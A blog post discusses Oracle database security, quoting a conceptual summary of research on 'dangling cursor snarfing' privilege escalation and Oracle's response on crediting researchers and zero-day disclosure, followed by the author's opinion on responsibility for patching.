There are several articles pertaining to Oracle security issues, unsurprisingly, you will come across an article entitled, “Oracle has more flaws than SQL Server”, or “Oracle databases four times worse than Microsoft” and similar type of articles on the Web. I just came across a research paper, entitled, “Dangling Cursor Snarfing: A New Class of Attack in Oracle” (pdf). Some excerpts:

we’ll now execute it as a low privileged user - but when we do so we’ll cause an exception in it by passing it too long a string:

The session now has a dangling cursor which can be snarfed by an attacker. Note from the output of PWD_COMPARE that the cursor has a value of 3 in this case. Incidentally,
even without seeing it’s 3 an attacker can still “guess” the value for the dangling cursor by going from 1 to n in a loop until they find it. When the attacker finds the dangling cursor, they can then recycle it – in other words they can rebind the username associated with the query and this time use SYS if they so choose.

My sense is that the above research study pessimistically stated the attack based on the two following assumptions below:

1) The database administrator (DBA) and security managers didn’t do their job and hence, allow an attacker a manner to steal the confidential data.

2) Users’ own problems. They failed to or improperly close the cursors that they created or failed to clean up the open cursors. Thus, we need to educate the users in using Oracle database properly.

In such above analysis, why we need to blame Oracle? If we regularly patch and secure the database’s configuration, we will be reasonably protected from the above attack.

Meanwhile, Oracle hits back at the above security critics by wrote a blog posting in response to the above security issues. Some excerpts:

Because software engineering is a complex discipline, the absence of security flaws in released software cannot be fully guaranteed. Such flaws may be detected during internal testing, or may be discovered externally by customers and security researchers. Regardless of who discovers these issues, Oracle’s top priority is to efficiently fix those flaws across all supported platforms in order to allow customers to maintain their security posture. This means that Oracle prioritizes those security flaws in order of severity, regardless of how they were discovered, in order to produce the appropriate fix. This also means that we acknowledge all of the vulnerabilities at the time of the issuance of the appropriate fix (for example, at the time of the Critical Patch Update) and we credit security researchers for any vulnerability they discovered in the Critical Patch Update documentation.

However, we do not credit security researchers who disclose the existence of vulnerabilities before a fix is available. We consider such practices, including disclosing “zero day” exploits, to be irresponsible as they can result in needlessly exposing customers to risk of attack.

My view is it is too early to say Oracle do not care about fixing their bugs, it is just the customers that dissatisfied with the Oracle’s security record. On the other hand, I really believed Oracle are getting better in manage the vulnerabilities in their products. If there are reports that stated bug found in Oracle’s products, whom have we to find fault with? The researchers that should bear the social responsibility? Or Oracle that did not release the most updated security patch? Or the customers that are not patch and secure their configuration in their databases? Moreover, if there has been a large scale attack targeting Oracle databases, we definitely been heard the Oracle customers switching to the competing products in the market.